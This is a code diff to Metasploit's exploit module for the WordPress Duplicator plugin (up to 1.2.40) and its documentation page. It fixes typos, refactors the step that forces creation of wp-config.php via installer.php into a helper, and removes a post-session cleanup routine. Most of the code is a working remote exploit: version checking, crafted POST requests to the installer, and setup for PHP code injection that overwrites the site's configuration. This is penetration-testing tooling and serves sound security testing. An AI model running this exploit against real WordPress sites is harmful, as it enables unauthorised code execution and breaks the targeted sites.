Fixed typos, removed not working cleaning

documentation/modules/exploit/multi/php/wordpress_duplicator.md

@@ -12,7 +12,7 @@ When the `installer.php` completes its process, the following files remain in th
 * `installer-log.txt`
 * `installer.php`
 
-WARNING: exploiting the vulnerability will overwrite the wp-config.php file, breaking the Wordpress instance.
+WARNING: exploiting the vulnerability will overwrite the wp-config.php file, breaking the WordPress instance.
 
 ## Vulnerable application
 
@@ -23,7 +23,7 @@ Put the `install.php` and archive files on a clean web server.
 
 Confirm that functionality works:
 1. Start `msfconsole`
-2. `use exploit/multi/php/wordpress_duplicator-`
+2. `use exploit/multi/php/wordpress_duplicator`
 3. Set the `RHOST`.
 4. Confirm the target is vulnerable: `check`
 5. Confirm that the target is vulnerable: `The target is vulnerable.`
@@ -41,7 +41,7 @@ The path to the installer.php file to exploit By default, the path is `/installe
 
 ## Scenarios
 
-### Debian 9 running Wordpress 4.9.8 with Duplicator 1.2.40
+### Debian 9 running WordPress 4.9.8 with Duplicator 1.2.40
 
 ```
 msf5 > use exploit/multi/php/wordpress_duplicator 

modules/exploits/multi/php/wordpress_duplicator.rb

@@ -56,24 +56,57 @@ class MetasploitModule < Msf::Exploit::Remote
     response = send_request_cgi({ 'uri' => tpath}, timeout=datastore['TIMEOUT'])
 
     unless response
-        vprint_error 'Connection failed'
-        return Exploit::CheckCode::Unknown
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
     end
 
     unless response.code == 200
-        vprint_error("Server responded with #{response.code}")
-        return Exploit::CheckCode::Safe
+      vprint_error("Server responded with #{response.code}")
+      return CheckCode::Safe
     end
 
     version = response.body.to_s.scan( /version: ([^<]*)</).last.first
     if Gem::Version.new(version) <= Gem::Version.new("1.2.40")
-        return Exploit::CheckCode::Vulnerable
+      return CheckCode::Vulnerable
     else
-        return Exploit::CheckCode::Detected
+      return CheckCode::Detected
     end
 
   end
 
+  def create_wp_config_file
+    # 1. GET the installer.php to retrieve the archive name.
+    response = send_request_cgi({'uri' => normalize_uri(datastore['TARGETURI'])}, timeout=datastore['TIMEOUT'])
+    if response && response.code == 200
+      archive_name = response.body.to_s.scan( /value="([^"]*.zip)"/)
+      archive_name = archive_name.first.first
+      print_status("Found archive name #{archive_name}")
+      # 2. Perform the 1st step to actually create the wp-config.php file.
+      response = send_request_cgi({
+        'method' => 'POST',
+        'uri'    => normalize_uri(datastore['TARGETURI']),
+        'vars_post'   => {
+          'action_ajax' => "1",
+          'action_step' => "1",
+          'archive_name' => archive_name,
+          'archive_engine' => "ziparchive",
+          'exe_safe_mode' => "0",
+          'archive_filetime' => "current",
+          'logging' => "1"
+        }
+      }, timeout=datastore['TIMEOUT'])
+      if response && response.code == 200
+        print_status("Successfully created the wp-config.php file!")
+      else
+        print_error("The archive file #{archive_name} was probably deleted.")
+        return
+      end
+    else
+      print_error("Failed to retrieve the archive name, cannot create the wp-config.php file")
+      return
+    end
+  end
+
   def exploit
     print_status("Checking if the wp-config.php file already exists...")
     tpath_wp_config = normalize_uri(datastore['TARGETURI'] + '/../wp-config.php')
@@ -81,36 +114,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if response && response.code == 404 # we have to perform action_step 1 to create the wp-config.php file.
       print_status("This WordPress was not restored. Creating the wp-config.php file...")
-      # 1. GET the installer.php to retrieve the archive name.
-      response = send_request_cgi({'uri' => normalize_uri(datastore['TARGETURI'])}, timeout=datastore['TIMEOUT'])
-      if response && response.code == 200
-        archive_name = response.body.to_s.scan( /value="([^"]*.zip)"/)
-        archive_name = archive_name.first.first
-        print_status("Found archive name #{archive_name}")
-        # 2. Perform the 1st step to actually create the wp-config.php file.
-        response = send_request_cgi({
-          'method' => 'POST',
-          'uri'    => normalize_uri(datastore['TARGETURI']),
-          'vars_post'   => {
-            'action_ajax' => "1",
-            'action_step' => "1",
-            'archive_name' => archive_name,
-            'archive_engine' => "ziparchive",
-            'exe_safe_mode' => "0",
-            'archive_filetime' => "current",
-            'logging' => "1"
-          }
-        }, timeout=datastore['TIMEOUT'])
-        if response && response.code == 200
-          print_status("Successfully created the wp-config.php file!")
-        else
-          print_error("The archive file #{archive_name} was probably deleted.")
-          return
-        end
-      else
-        print_error("Failed to retrieve the archive name, cannot create the wp-config.php file")
-        return
-      end
+      create_wp_config_file()
     end
 
     # 2. Exploit the code injection.
@@ -136,21 +140,4 @@ class MetasploitModule < Msf::Exploit::Remote
       print_error("Failed to inject PHP code in wp-config.php...")
     end
   end
-
-  def on_new_session(session)
-    print_status("Cleaning up...")
-    send_request_cgi({
-      'method' => 'POST',
-      'uri'    => normalize_uri(datastore['TARGETURI']),
-      'vars_post'   => {
-        'action_ajax' => "3",
-        'action_step' => "3",
-        'dbhost' => rand_text_alphanumeric(20),
-        'dbname' => rand_text_alphanumeric(20),
-        'dbpass' => rand_text_alphanumeric(20),
-        'dbuser' => "test",
-        'dbport' => rand_text_numeric(5)
-      }
-    }, timeout=datastore['TIMEOUT'])
-  end
 end